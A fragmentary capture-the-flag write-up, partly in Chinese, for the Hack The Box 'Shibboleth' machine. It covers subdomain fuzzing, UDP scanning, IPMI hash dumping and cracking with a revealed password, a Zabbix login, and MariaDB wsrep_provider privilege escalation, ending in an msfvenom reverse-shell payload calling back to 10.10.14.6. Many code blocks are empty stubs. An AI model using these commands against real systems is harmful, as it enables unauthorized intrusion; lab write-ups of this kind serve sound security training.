HTB-Shibboleth
Shibboleth
NMAP
1 | |
列舉
subdomain
1
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u Shibboleth.htb -H 'host:FUZZ.Shibboleth.htb' --hw 26
UDP
1
nmap -Pn -n -sU -p- --min-rate 2000 10.10.11.124 --open
IPMI
1
2
3msfconsole
scanner/ipmi/ipmi_version
1 | |

1 | |

1 | |

hashcat crack IPMI2 RAKP HMAC-SHA1
1
2
3hashcat -m 7300 -a 0 hash /usr/share/wordlists/rockyou.txt
ilovepumkinpie1
登入zabbix
1
2利用剛剛獲得的憑證Administrator:ilovepumkinpie1
登入zabbix
外殼
1 | |

- reverse shell

提權
1 | |

- 漏洞利用
1
2
3
4
5
6查看mariadb 版本
select @@version;
10.3.25-MariaDB-0ubuntu0.20.04.1
MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
https://github.com/Al1ex/CVE-2021-279281
msfvenom -p linux/x64/shell_reverse_tcp lhost=10.10.14.6 lport=443 -f elf-so > journalctl.so
1 | |

1 | |
1 | |

HTB-Shibboleth
https://0xbe61a55f.github.io/2022/11/30/HTB-Shibboleth/